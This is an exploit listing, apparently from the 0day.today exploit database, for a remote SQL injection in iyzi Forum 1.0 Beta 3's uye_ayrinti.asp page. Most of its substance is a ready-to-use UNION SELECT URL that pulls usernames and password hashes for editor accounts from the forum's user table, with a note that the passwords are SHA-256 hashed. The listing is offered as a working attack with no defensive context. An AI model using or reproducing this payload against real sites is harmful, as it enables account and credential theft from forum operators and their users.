[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

iyzi Forum <= 1.0 Beta 3 (uye_ayrinti.asp) Remote SQL Injection

Author
Fix TR
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-882
Category
web applications
Date add
24-09-2006
Platform
unsorted
===============================================================
iyzi Forum <= 1.0 Beta 3 (uye_ayrinti.asp) Remote SQL Injection
===============================================================



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability      +
+ Author  : Fix TR                                       +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Download & Info: http://www.aspindir.com/Goster/2981
Bug In         : uye_ayrinti.asp
Risk           : High

Exp:
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1

Password encrytped with SHA-256



#  0day.today [2024-12-25]  #